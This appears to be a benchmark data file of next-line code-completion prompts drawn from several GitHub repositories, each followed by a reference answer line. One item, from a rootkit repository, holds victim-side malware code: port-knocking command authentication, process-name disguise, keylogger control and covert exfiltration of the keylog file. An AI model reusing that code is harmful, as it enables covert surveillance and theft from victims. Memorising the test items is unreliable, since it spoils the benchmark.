You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: mariaalfaroc/a2s-transformer # Path: my_utils/encoding_convertions.py VOICE_CHANGE_TOKEN = "<COC>" # Path: my_utils/encoding_convertions.py STEP_CHANGE_TOKEN = "<COR>" # Path: my_utils/metrics.py import os import shutil from music21 import converter as converterm21 from pyMV2H.utils.mv2h import MV2H from pyMV2H.metrics.mv2h import mv2h from pyMV2H.utils.music import Music from pyMV2H.converter.midi_converter import MidiConverter as Converter from .encoding_convertions import VOICE_CHANGE_TOKEN, STEP_CHANGE_TOKEN def compute_metrics(y_true, y_pred): ################################# Sym-ER and Seq-ER: metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred) ################################# MV2H: mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred) metrics.update(mv2h_dict) return metrics #################################################################### SYM-ER AND SEQ-ER: def compute_ed_metrics(y_true, y_pred): def levenshtein(a, b): n, m = len(a), len(b) if n > m: a, b = b, a n, m = m, n current = range(n + 1) for i in range(1, m + 1): previous, current = current, [i] + [0] * n for j in range(1, n + 1): add, delete = previous[j] + 1, current[j - 1] + 1 change = previous[j - 1] if a[j - 1] != b[i - 1]: change = change + 1 current[j] = min(add, delete, change) return current[n] ed_acc = 0 length_acc = 0 label_acc = 0 for t, h in zip(y_true, y_pred): ed = levenshtein(t, h) ed_acc += ed length_acc += len(t) if ed > 0: label_acc += 1 return { "sym-er": 100.0 * ed_acc / length_acc, "seq-er": 100.0 * label_acc / len(y_pred), } #################################################################### MV2H: def compute_mv2h_metrics(y_true, y_pred): def krn2midi(in_file): a = converterm21.parse(in_file).write("midi") midi_file = a.name shutil.copyfile(a, midi_file) os.remove(in_file) return midi_file def midi2txt(midi_file): txt_file = midi_file.replace("mid", "txt") converter = Converter(file=midi_file, output=txt_file) converter.convert_file() with open(txt_file, "r") as fin: f = [u.replace(".0", "") for u in fin.readlines()] with open(txt_file, "w") as fout: for u in f: fout.write(u) os.remove(midi_file) return txt_file ########################################### Polyphonic evaluation: def eval_as_polyphonic(): # Convert to MIDI reference_midi_file = krn2midi("true.krn") predicted_midi_file = krn2midi("pred.krn") # Convert to TXT reference_txt_file = midi2txt(reference_midi_file) predicted_txt_file = midi2txt(predicted_midi_file) # Compute MV2H reference_file = Music.from_file(reference_txt_file) transcription_file = Music.from_file(predicted_txt_file) res_dict = MV2H(multi_pitch=0, voice=0, meter=0, harmony=0, note_value=0) try: res_dict = mv2h(reference_file, transcription_file) except: pass # Remove auxiliar files os.remove(reference_txt_file) os.remove(predicted_txt_file) return res_dict ########################################### Monophonic evaluation: def get_number_of_voices(kern): num_voices = 0 for token in kern: if token == VOICE_CHANGE_TOKEN: continue
if token == STEP_CHANGE_TOKEN:
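The reference completion handles the step-change token inside the voice-counting scan. One plausible standalone reading, counting voice changes within a step and resetting at each <COR>; the repo's actual bookkeeping may differ:

```
VOICE_CHANGE_TOKEN = "<COC>"
STEP_CHANGE_TOKEN = "<COR>"

def get_number_of_voices(kern):
    num_voices, current = 0, 0
    for token in kern:
        if token == VOICE_CHANGE_TOKEN:
            current += 1                     # another concurrent voice in this step
        elif token == STEP_CHANGE_TOKEN:
            num_voices = max(num_voices, current + 1)
            current = 0                      # reset at the row boundary
    return num_voices

print(get_number_of_voices(["a", "<COC>", "b", "<COR>", "c", "<COR>"]))  # -> 2
```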
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: YashsviG/rootkit # Path: portknocker.py def port_knocking(victim_ip): """ Perform port knocking on the victim side to authenticate the commander. Args: victim_ip (str): IP address of the victim. Returns: tuple: IP address and port number if successful, None otherwise. """ potential_commanders = {} while True: packet = sniff(filter=f"tcp and dst {victim_ip}", count=1)[0] if TCP in packet and IP in packet: src_ip = packet[IP].src src_port = packet[TCP].dport if src_port in knock_ports: current_time = time.time() if src_ip not in potential_commanders: potential_commanders[src_ip] = [] potential_commanders[src_ip].append((src_port, current_time)) # Check if all knock ports have been hit within the timeout period print(potential_commanders) if len(potential_commanders[src_ip]) >= len(knock_ports): # Check for valid timestamps valid_timestamps = True for i, (port, timestamp) in enumerate(potential_commanders[src_ip]): if i == 0: continue previous_timestamp = potential_commanders[src_ip][i - 1][1] if abs(timestamp - previous_timestamp) > timeout: valid_timestamps = False potential_commanders.pop(src_ip) if valid_timestamps: # Successful port knocking sequence return src_ip, 7000 # Wait for the next packet time.sleep(0.1) # Path: processname.py def choose_process_name(): """ Choose a process name based on existing process names. Returns: str: Chosen process name. """ # Get a list of all existing process names existing_process_names = [p.name() for p in psutil.process_iter()] if existing_process_names: chosen_name = analyze_existing_process_names() else: chosen_name = "nvme-update-wq" print(f"Process name chosen {chosen_name}") return chosen_name # Path: utils.py def get_ip_address(): """ Get the local IP address of the machine. Returns: str: Local IP address. """ with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s: s.connect(("8.8.8.8", 80)) name = s.getsockname()[0] return name # Path: utils.py def transfer_keylog_file(keylogger, covert, file_path): """ Transfer the keylog file. Args: keylogger (Keylogger): Keylogger instance. covert (CovertChannel): Covert channel instance. file_path (str): Path of the keylog file. Returns: int: Status code (3 if unsuccessful). """ if keylogger.get_status(): print("VICTIM:: Cannot transfer, Keylogger running") return 3 if not os.path.exists(file_path): print("VICTIM:: keylog.txt does not exist") return 3 covert.cmd = 0 covert.send_data(for_victim=False) covert.cmd = None covert.file_name = file_path covert.send_data(for_victim=False, event="IN_CREATE") covert.file_name = None os.remove(file_path) # Path: utils.py def check_exists(path): """ Check if a file or directory exists. Args: path (str): Path to check. Returns: bool: True if exists, False otherwise. """ if os.path.exists(path): return True return False # Path: victim.py import argparse import setproctitle import shutil from keylogger import * from watcher import * from portknocker import port_knocking from processname import choose_process_name from utils import get_ip_address, transfer_keylog_file, check_exists def handle_command(command: int, keylogger, watcher, covert): """ Handle the received command. Args: command (int): Received command. 
keylogger (Keylogger): Keylogger instance. watcher (Watcher): Watcher instance. covert (CovertChannel): Covert channel instance. Returns: int: Result code. """ if command == 0: return 0 print(f"VICTIM:: Command Received", end=" ") if command == 1: print("VICTIM:: Received command to start the keylog program...") keylogger.start_keylogger() return 1 elif command == 2: print("VICTIM:: Received command to stop the keylog program...") if not keylogger.get_status(): print("VICTIM:: Keylogger is not running.") return 2 val = keylogger.stop_keylogger() if val == 0: print("VICTIM:: Keylogger has been stopped.") return 2 elif command == 3: print("VICTIM:: Received command to transfer the keylog file...") return transfer_keylog_file(keylogger, covert, "keylog.txt") elif command == 4: print(f"VICTIM:: Received command to watch file...") file = covert.receive_data(for_victim=True)
i = check_exists(file)
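The reference completion verifies the requested file exists before watching it. The surrounding if/elif chain is a classic integer-command dispatch; a compact table-driven sketch of the same idea, with hypothetical handler bodies:

```
def start_keylogger():  return 1     # hypothetical stand-ins for the real actions
def stop_keylogger():   return 2
def transfer_keylog():  return 3

HANDLERS = {1: start_keylogger, 2: stop_keylogger, 3: transfer_keylog}

def handle_command(command: int) -> int:
    handler = HANDLERS.get(command)
    return handler() if handler else 0   # 0 doubles as the no-op code, as above

print(handle_command(2))   # -> 2
```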
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: yacinxx/dnakey # Path: profile_config/config_manager.py class ConfigManager: def __init__(self, prime_key:str) -> None: with open("profile_config/profile_config.json", "r") as f: self.profile_data = __import__("json").loads(f.read()) self.profile_config = self.profile_data["profiles_config"] self.prime_key = prime_key self.create_date = datetime.datetime.now() self.formatted_datetime = self.create_date.isoformat() def configuration(self): return self.profile_config def update_created_profiles(self): self.profile_config[self.prime_key]["created_profiles"] +=1 toast(":orange[**1 Profile has been added to your prime key**]", icon="🍨") return self.profile_config[self.prime_key]["created_profiles"] def get_date_time(self): return self.profile_config[self.prime_key]["date_time"] def update_date_time(self): if self.profile_config[self.prime_key]["date_time"] is None: self.profile_config[self.prime_key].update({"date_time": self.formatted_datetime}) success("**You 'Prime Key' has been activated successfully!**", icon="🍧") snow() def update_profile_activity(self, id_profile:int, activate_merge:bool, save_cookies:bool, formatted_datetime:str) -> None: self.action = self.profile_config[self.prime_key]["profile_activity"]["action"] if id_profile not in self.action: self.action.update({id_profile:{ "active_usage": 0, "active_merge": activate_merge, "date_time": formatted_datetime, "request_status": "online", "save_cookies": save_cookies, "version": VERSION} }) def get_created_profiles(self): return self.profile_config[self.prime_key]["created_profiles"] def get_active_profiles(self): active_profiles_ids = [] active_profiles = 0 active_profiles_list = list(self.profile_config[self.prime_key]["profile_activity"]["action"]) for i in active_profiles_list: if self.profile_config[self.prime_key]["profile_activity"]["action"][i]["active_usage"] != 0: active_profiles+=1 active_profiles_ids.append(f"id:{i}") return active_profiles, active_profiles_ids if len(active_profiles_ids) != 0 else "" def get_online_profiles(self): all_profiles_online = [] active_profiles_list = list(self.profile_config[self.prime_key]["profile_activity"]["action"]) for i in active_profiles_list: if self.profile_config[self.prime_key]["profile_activity"]["action"][i]["request_status"] == "online": all_profiles_online.append("online") else: all_profiles_online.append("offline") if all(profile == "online" for profile in all_profiles_online): return "Online!" else: return "Not all profiles are online!" 
def check_active_usage(self): all_profiles_active_usage = [] for i in list(self.profile_config[self.prime_key]["profile_activity"]["action"]): all_profiles_active_usage.append(self.profile_config[self.prime_key]["profile_activity"]["action"][i]["active_usage"]) if all(profile == 0 for profile in all_profiles_active_usage): return "first_time" def get_profile_active_usage(self, id_profile:str) -> int: return self.profile_config[self.prime_key]["profile_activity"]["action"][id_profile]["active_usage"] def update_profile_active_usage(self, id_profile:str) -> None: self.profile_config[self.prime_key]["profile_activity"]["action"][id_profile]["active_usage"] +=1 def get_merge_active_usage(self): return len(list(self.profile_config[self.prime_key]["profile_activity"]["action_merge"])) def get_profile_action_merge(self, id_profile:str) -> list[int]: get_merge = self.profile_config[self.prime_key]["profile_activity"]["action_merge"][id_profile] action_merge_len = len(list(get_merge.keys())) action_merge = sum(list(get_merge.values())) return action_merge_len, action_merge def update_profile_action_merge(self, id_profile:str, merge_with:str) -> None: action_merge = self.profile_config[self.prime_key]["profile_activity"]["action_merge"] if id_profile not in list(action_merge.keys()): action_merge.update({id_profile:{f"({id_profile},{merge_with})": 0}}) if id_profile in list(action_merge.keys()): if f"({id_profile},{merge_with})" in list(action_merge[id_profile].keys()): action_merge[id_profile][f"({id_profile},{merge_with})"] +=1 else: action_merge[id_profile].update({f"({id_profile},{merge_with})": 0}) action_merge[id_profile][f"({id_profile},{merge_with})"] +=1 def update_config(self): with open("profile_config/profile_config.json", "w") as f: __import__("json").dump(self.profile_data, f, indent=3) # Path: license/license_manager.py VERSION = license_data["version"] # Path: enginev2.py from cryptography.fernet import Fernet from profile_config.config_manager import ConfigManager from license.license_manager import VERSION import random, json, string, datetime class DNAEngine(): def __init__( self, has_key="test", profile_name="profile_test", activate_merge=True, save_cookies=True, **advance_settings): self.has_key = has_key self.profile_name = profile_name self.length = advance_settings.get("length", 40) self.has_lower = advance_settings.get("has_lower", True) self.has_upper = advance_settings.get("has_upper", True) self.has_number = advance_settings.get("has_number", True) self.has_symbol = advance_settings.get("has_symbol", False) self.has_arabic = advance_settings.get("has_arabic", False) self.activate_merge = activate_merge self.save_cookies = save_cookies # Create a Fernet object with the secret key secret_key = self.has_key.encode("utf-8") self.fernet = Fernet(secret_key) self.create_date = datetime.datetime.now() # Convert datetime to string self.formatted_datetime = self.create_date.isoformat() self.random_func = { "lower": self.get_random_lower, "upper": self.get_random_upper, "number": self.get_random_number, "symbol": self.get_random_symbol, "arabic": self.get_random_arabic } def create_id_profile(self): self.config_has_key = f"dnakey${self.has_key[:32:2]}"
self.config_manager = ConfigManager(self.config_has_key)
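The reference completion wires the derived prime key into the ConfigManager, and the class itself leans on Fernet for symmetric encryption. A self-contained Fernet round trip; the key here is freshly generated, whereas the repo derives its key from has_key:

```
from cryptography.fernet import Fernet

key = Fernet.generate_key()            # 32 url-safe base64-encoded bytes
fernet = Fernet(key)
token = fernet.encrypt(b"dnakey-profile")
assert fernet.decrypt(token) == b"dnakey-profile"
```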
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: tamnva/hydroecolstm # Path: hydroecolstm/model_run.py def run_train(config_file): # Load configuration config = read_config(config_file) # Read and split data data = read_train_test_data(config) # Scale/transformer name for static, dynamic, and target features x_scaler_name, y_scaler_name = get_scaler_name(config) # Scaler/transformer x_scaler, y_scaler = Scaler(), Scaler() x_scaler.fit(x=data["x_train"], method=x_scaler_name) y_scaler.fit(x=data["y_train"], method=y_scaler_name) # Scale/transform data x_train_scale = x_scaler.transform(x=data["x_train"]) x_test_scale = x_scaler.transform(x=data["x_test"]) y_train_scale = y_scaler.transform(x=data["y_train"]) # Create the model if config["model_class"] == "LSTM": model = Lstm_Linears(config) else: model = Ea_Lstm_Linears(config) # Train with train dataset trainer = Train(config, model) model, y_train_scale_simulated = trainer(x=x_train_scale, y=y_train_scale) # Simulated result with test dataset y_test_simulated_scale = model(x_test_scale) # Inverse scale/transform back simulated result to real scale data["y_train_simulated"] = y_scaler.inverse(y_train_scale_simulated) data["y_test_simulated"] = y_scaler.inverse(y_test_simulated_scale) return model, x_scaler, y_scaler, data, config # Path: hydroecolstm/utility/plot.py def plot(data: dict, object_id:str, train_test_period:str, target_feature:str): # Get key of observed and simulated target features y_observed = "y_" + train_test_period y_simulated = "y_" + train_test_period + "_simulated" time = "time_" + train_test_period # Get index of the target feature index = data["y_column_name"].index(target_feature) # Extract obeserved and target features from data y_observed = data[y_observed][object_id][:, index].detach().numpy() y_simulated = data[y_simulated][object_id][:, index].detach().numpy() time = data[time][object_id] # Now plot simulated and observed plt.plot(time, y_simulated, color = 'blue', label = "Simulated", alpha=0.9, linewidth=0.75) plt.plot(time, y_observed, color = 'red', label = "Observed", alpha=0.9, linewidth=0.75) plt.title(label=f"Object id = {object_id}, period = {train_test_period}") plt.ylabel(target_feature) plt.legend() return plt # Path: hydroecolstm/interface/main_gui.py def show_gui(): app = MainGUI() app.mainloop() # Path: examples/example_run.py from hydroecolstm.model_run import run_train from hydroecolstm.utility.plot import plot from hydroecolstm.interface.main_gui import show_gui # Import hydroecolstm function #-----------------------------------------------------------------------------# # Run the model # #-----------------------------------------------------------------------------# # Configuration file config_file = "C:/Users/nguyenta/Documents/GitHub/config.yml" # Train the model => return model, x_scaler, y_scaler, data model, x_scaler, y_scaler, data, config = run_train(config_file) # Visualize result: train_test_period = "train" or "test" for object_id in config["object_id"]: for target in config["target_features"]: p = plot(data, object_id=str(object_id), train_test_period="test", target_feature=target) p.show() #-----------------------------------------------------------------------------# # Work with GUI, use the two lines below to call the GUI # #-----------------------------------------------------------------------------#
show_gui()
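The reference completion launches the GUI path. A generic sketch of the two entry points the example script juxtaposes, scripted run versus GUI, with print calls standing in for the real training and main loop:

```
def run_scripted(config_file: str) -> None:
    print(f"training with {config_file}")      # stand-in for run_train plus the plot loop

def show_gui() -> None:
    print("launching GUI main loop")           # stand-in for MainGUI().mainloop()

if __name__ == "__main__":
    run_scripted("config.yml")                 # or show_gui() for the interactive path
```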
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: LuhhLu/Predictive-Video-Segmentation # Path: Unet.py def Load_unet(path=None): if path: unet_model = UNet(n_channels=3, n_classes=49) unet_model.load_state_dict(torch.load(path)) else: unet_model = UNet(n_channels=3, n_classes=49) return unet_model # Path: Unet.py class CustomDataset(Dataset): def __init__(self, image_dir, mask_dir, transform=None): self.image_dir = image_dir self.mask_dir = mask_dir self.transform = transform self.images = os.listdir(image_dir) def __len__(self): return len(self.images) def __getitem__(self, idx): img_name = self.images[idx] img_path = os.path.join(self.image_dir, img_name) # Update mask name to match new naming convention and extension mask_name = img_name.replace('image', 'mask').replace('.png', '.npy') mask_path = os.path.join(self.mask_dir, mask_name) image = Image.open(img_path).convert("RGB") mask = np.load(mask_path) # Load mask as numpy array if self.transform: seed = np.random.randint(2147483647) # Random seed for consistent transformations random.seed(seed) torch.manual_seed(seed) # Apply transformations to the image image = self.transform(image) # One-hot encode the transformed mask mask = one_hot_encode_mask(mask, 49) # Convert the mask back to a tensor mask = torch.from_numpy(mask) return image, mask # Path: Unet.py class WeightedBCEWithLogitsLoss(nn.Module): def __init__(self, weights, reduction='mean'): super().__init__() self.weights = weights self.reduction = reduction self.bce_loss = nn.BCEWithLogitsLoss(reduction='none') def forward(self, inputs, targets): bce_loss = self.bce_loss(inputs, targets) weights_expanded = self.weights.view(1, -1, 1, 1).to(bce_loss.device) weighted_loss = bce_loss * weights_expanded if self.reduction == 'mean': return weighted_loss.mean() elif self.reduction == 'sum': return weighted_loss.sum() else: return weighted_loss # Path: unet_train.py from tqdm import tqdm from torch.utils.data import DataLoader from torchvision import transforms from Unet import Load_unet, CustomDataset, WeightedBCEWithLogitsLoss import torch import torch.optim as optim import argparse def main(): # Command-line arguments parser = argparse.ArgumentParser(description='Train UNet with custom settings') parser.add_argument('--lr', type=float, default=0.001, help='Learning rate') parser.add_argument('--batch', type=int, default=64, help='Batch size') parser.add_argument('--res', type=str, default='full', help='Resolution in the format H,W') parser.add_argument('--epoch', type=int, default=10, help='number of training epochs') args = parser.parse_args() # Process resolution argument if args.res == 'full': transform = transforms.Compose([ transforms.ToTensor(), ]) resolution = (160, 240) else: try: res_value = int(args.res) resolution = (res_value, res_value) transform = transforms.Compose([ transforms.ToTensor(), transforms.Resize(resolution, antialias=True), transforms.Resize((160, 240), antialias=True) ]) except ValueError: raise ValueError("Invalid resolution value. Please provide 'full' or a single number.") if args.res == 'full': print("Training with Resolution: (160, 240)") filename_suffix = 'full' else: res_value = int(args.res) print(f"Training with Resolution: ({res_value}, {res_value})") filename_suffix = str(res_value)
train_dataset = CustomDataset('unet_train/images', 'unet_train/masks', transform)
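The reference completion instantiates the image and mask dataset that feeds training. A toy, fully runnable stand-in showing the same Dataset to DataLoader wiring and the tensor shapes the 49-class, 160x240 setup above expects:

```
import torch
from torch.utils.data import Dataset, DataLoader

class ToyDataset(Dataset):
    def __init__(self, n=4):
        self.x = torch.randn(n, 3, 160, 240)                     # image-shaped inputs
        self.y = torch.randint(0, 2, (n, 49, 160, 240)).float()  # one-hot style masks

    def __len__(self):
        return len(self.x)

    def __getitem__(self, idx):
        return self.x[idx], self.y[idx]

loader = DataLoader(ToyDataset(), batch_size=2, shuffle=True)
images, masks = next(iter(loader))
print(images.shape, masks.shape)   # [2, 3, 160, 240] and [2, 49, 160, 240]
```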
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: garinops/chat-E-AI # Path: config/settings.py ITCHAT_CALL_CODE_SELF = "AI" # Path: config/settings.py ITCHAT_CALL_CODE = "AI" # Path: config/settings.py ITCHAT_WHITELIST_FRIEND = {} # Path: embed/reply/text.py class EReplyText: @staticmethod def reply(client, message:MessageCea) -> Send: _ceaMsg = message _action = _ceaMsg.Action _send = Send.model_construct() if _action: # 记录日志 client.logger.info(f'Message Signal RX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_ceaMsg.Content)}') """获取session""" _sess = client.get_session(sess_user_name=_ceaMsg.UserToSession) """session 消息入列""" _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content) # AI sys messages更新。 if _sess.ai.msgSysChck: if _ceaMsg.Content.startswith("###"): _sess.ai.msgSys = _ceaMsg.Content[3:] _sess.ai.msgSysChck = False else: if _ceaMsg.Content.startswith("$$$"): _sess.ai.msgSys = OPENAI_SYSTEM_CONTENT _sess.ai.msgSysChck = True client.logger.info("AI System Role:" + OPENAI_SYSTEM_CONTENT) _sess.msgQueue.clear() """session 消息重新入列""" _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content) elif _ceaMsg.Content.startswith("###"): _sess.ai.msgSys = _ceaMsg.Content[3:] client.logger.info("AI System Role:" + _sess.ai.msgSys) else: client.logger.info("AI System Role:" + _sess.ai.msgSys) # AI user messages更新。 _sess.ai.msgUserAssi = _sess.msgQueue.queue """AI调用""" _sess.ai.response() _rspAi = _sess.ai.responseAI _rspAns = _rspAi.answer """messages后置处理""" _sess.msgQueue.enqueue_assistant(message_content=_rspAns) """assistant messages入列。""" _sess.ai.msgUserAssi = _sess.msgQueue.queue """会话实例中的OpenAI实例 messages更新。""" # 添加前后缀 # client.logger.debug({"MessageCea":_ceaMsg}) _contentOutput = f'@{_ceaMsg.NickName}\n{EUtilsSuffix.add_suffix(_rspAi)}' if _ceaMsg.IsGroup else EUtilsSuffix.add_suffix(_rspAi) # 返回 _send.content = _contentOutput _send.user = _ceaMsg.UserToReply _send.action = True # client.logger.debug(_send) # 记录日志 client.logger.info(f'Message Signal TX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_contentOutput)}') else: pass return _send # Path: models/messages.py class MessageItchat(BaseModel): FromUserName: str ToUserName: str Type: str User: Optional[User] Content: Optional[str] = None Text: Union[list[str], str, Callable] ActualNickName: Optional[str] = None IsAt: Optional[bool] = False # Path: models/messages.py class MessageCea(BaseModel): UserToReply: Optional[str] = None UserToSession: Optional[str] = None Content: Optional[str] = None Action: Optional[bool] = False NickName: Optional[str] = None IsGroup: Optional[bool] = False # Path: models/send.py class Send(BaseModel): user: Optional[str] = None content: Optional[str] = None action: Optional[bool] = False # Path: embed/clients/itchat/messages/friend.py from config.settings import ITCHAT_CALL_CODE_SELF, ITCHAT_CALL_CODE, ITCHAT_WHITELIST_FRIEND from embed.reply.text import EReplyText from models.messages import MessageItchat, MessageCea from models.send import Send def handle_friend_message(client, message: MessageItchat) -> Send: _callCodeSelf = ITCHAT_CALL_CODE_SELF _callCode = ITCHAT_CALL_CODE
_whiteListFriend = ITCHAT_WHITELIST_FRIEND
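The reference completion pulls in the friend whitelist alongside the call codes. A tiny sketch of the gate such a handler typically applies; treating an empty whitelist as allow-all is an assumption, not necessarily this repo's behavior:

```
ITCHAT_WHITELIST_FRIEND = {"alice", "bob"}   # illustrative names

def allowed(nickname: str, whitelist: set) -> bool:
    # empty whitelist means allow everyone (assumption for this sketch)
    return not whitelist or nickname in whitelist

print(allowed("alice", ITCHAT_WHITELIST_FRIEND), allowed("eve", ITCHAT_WHITELIST_FRIEND))
```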
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: ruudjuffermans/Event-Driven-Backtester # Path: backtester/events.py class FillEvent(Event): """ Fill event once an order based on the response from the broker Parameters: datetime - A datetime at which the signal is created. symbol - The symbol for current asset. exchange - The exchange, broker where the order is filled quantity - quantity filled direction fill_cost - can contain commission already commission - Defaulted to None if non specified """ def __init__( self, datetime, symbol, exchange, quantity, direction, fill_cost, commission=None, ): self.type = "FILL" self.datetime = datetime self.symbol = symbol self.exchange = exchange self.quantity = quantity self.direction = direction self.fill_cost = fill_cost # Calculate commission if commission is None: self.commission = self._calculate_commission() else: self.commission = commission def _calculate_commission(self): """ TODO: Commission fees to be implemented """ # between 1 and 2% return max(1.5, 0.015 * self.quantity) # Path: backtester/events.py class OrderEvent(Event): """ Order event to be sent to a broker api. It takes into account the quantity, type of ordering, and direction (long, short, exit...) Parameters: symbol - The symbol for current asset. order_type - Whether is it a 'MARKET' or 'LIMIT' order quantity --> TODO: this should be implemented in a risk class (Kelly Criterion, etc) direction - 1 or -1 based on the type """ def __init__(self, symbol, order_type, quantity, direction): self.type = "ORDER" self.symbol = symbol self.order_type = order_type self.quantity = quantity self.direction = direction def print_order(self): """ Outputs the values within the Order. """ print("Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s") % ( self.symbol, self.order_type, self.quantity, self.direction, ) # Path: backtester/execution.py from abc import abstractmethod from datetime import datetime from .events import FillEvent, OrderEvent class ExecutionHandler: def register(self, events): self.events = events @abstractmethod def execute_order(self, event): raise NotImplementedError("Should implement execute_order()") class SimulatedExecutionHandler(ExecutionHandler): def __init__(self): pass def execute_order(self, event):
if isinstance(event, OrderEvent):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: liebrandapps/FindMyGUI

# Path: findmy/pypush_gsa_icloud.py
def icloud_login_mobileme(ctx, second_factor='sms'):
    username = ctx.cfg.appleId_appleId
    password = ctx.cfg.appleId_password
    anisetteUrl = ctx.cfg.general_anisetteHost + ":" + str(ctx.cfg.general_anisettePort)
    if not username or not password:
        now = datetime.now()
        ctx.signInDone = False
        ctx.requestCreds = int(now.timestamp())
        ctx.log.info("[ICLOUD] Waiting for password (90 seconds from now on)")
        interval = 30
        while interval > 0:
            time.sleep(3.0)
            if len(ctx.userName) > 0 and len(ctx.password) > 0:
                username = ctx.userName
                password = ctx.password
                interval = 0
                continue
        if not username or not password:
            ctx.log.error("[ICLOUD] No User/Password received, stopping")
            return None
        else:
            ctx.log.info(f"[ICLOUD] Received User {username} / Password")
    g = gsa_authenticate(username, password, ctx, second_factor=second_factor)
    pet = g["t"]["com.apple.gs.idms.pet"]["token"]
    adsid = g["adsid"]

    data = {
        "apple-id": username,
        "delegates": {"com.apple.mobileme": {}},
        "password": pet,
        "client-id": str(USER_ID),
    }
    data = plist.dumps(data)

    headers = {
        "X-Apple-ADSID": adsid,
        "User-Agent": "com.apple.iCloudHelper/282 CFNetwork/1408.0.4 Darwin/22.5.0",
        "X-Mme-Client-Info": '<MacBookPro18,3> <Mac OS X;13.4.1;22F8> <com.apple.AOSKit/282 (com.apple.accountsd/113)>'
    }
    headers.update(generate_anisette_headers(anisetteUrl))

    r = requests.post(
        "https://setup.icloud.com/setup/iosbuddy/loginDelegates",
        auth=(username, pet),
        data=data,
        headers=headers,
        verify=False,
    )

    return plist.loads(r.content)

# Path: findmy/pypush_gsa_icloud.py
def generate_anisette_headers(anisetteUrl):
    try:
        import pyprovision
        from ctypes import c_ulonglong
        import secrets
        adi = pyprovision.ADI("./anisette/")
        adi.provisioning_path = "./anisette/"
        device = pyprovision.Device("./anisette/device.json")
        if not device.initialized:
            # Pretend to be a MacBook Pro
            device.server_friendly_description = "<MacBookPro13,2> <macOS;13.1;22C65> <com.apple.AuthKit/1 (com.apple.dt.Xcode/3594.4.19)>"
            device.unique_device_identifier = str(uuid.uuid4()).upper()
            device.adi_identifier = secrets.token_hex(8).lower()
            device.local_user_uuid = secrets.token_hex(32).upper()
        adi.identifier = device.adi_identifier
        dsid = c_ulonglong(-2).value
        is_prov = adi.is_machine_provisioned(dsid)
        if not is_prov:
            print("provisioning...")
            provisioning_session = pyprovision.ProvisioningSession(adi, device)
            provisioning_session.provision(dsid)
        otp = adi.request_otp(dsid)
        a = {"X-Apple-I-MD": base64.b64encode(bytes(otp.one_time_password)).decode(),
             "X-Apple-I-MD-M": base64.b64encode(bytes(otp.machine_identifier)).decode()}
    except ImportError:
        print(f'pyprovision is not installed, querying {anisetteUrl} for an anisette server')
        h = json.loads(requests.get(anisetteUrl, timeout=5).text)
        a = {"X-Apple-I-MD": h["X-Apple-I-MD"], "X-Apple-I-MD-M": h["X-Apple-I-MD-M"]}
    a.update(generate_meta_headers(user_id=USER_ID, device_id=DEVICE_ID))
    return a

# Path: findmy/request_reports.py
import base64
import datetime
import hashlib
import json
import os
import struct

import requests
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

from findmy.pypush_gsa_icloud import icloud_login_mobileme, generate_anisette_headers


class FindMy:
    def __init__(self, ctx):
        self.ctx = ctx

    def sha256(self, data):
        digest = hashlib.new("sha256")
        digest.update(data)
        return digest.digest()

    def decrypt(self, enc_data, algorithm_dkey, mode):
        decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
        return decryptor.update(enc_data) + decryptor.finalize()

    def decode_tag(self, data):
        latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
        longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
        confidence = int.from_bytes(data[8:9], 'big')
        status = int.from_bytes(data[9:10], 'big')
        return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}

    def getAuth(self, regenerate=False, second_factor='sms'):
        CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
        if os.path.exists(CONFIG_PATH) and not regenerate:
            with open(CONFIG_PATH, "r") as f:
                j = json.load(f)
        else:
            mobileme = None
            try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: Samuel-Effiong/Django-Dynamic-Table

# Path: django_dynamic_table/errors.py
class TableHaveNoRow(DynamicTableError):
    pass

# Path: django_dynamic_table/errors.py
class TableHaveNoColumn(DynamicTableError):
    pass

# Path: django_dynamic_table/errors.py
class ColumnNotInTable(DynamicTableError):
    pass

# Path: django_dynamic_table/errors.py
class RowNotInTable(DynamicTableError):
    pass

# Path: django_dynamic_table/errors.py
class DuplicateColumnInTable(DynamicTableError):
    pass

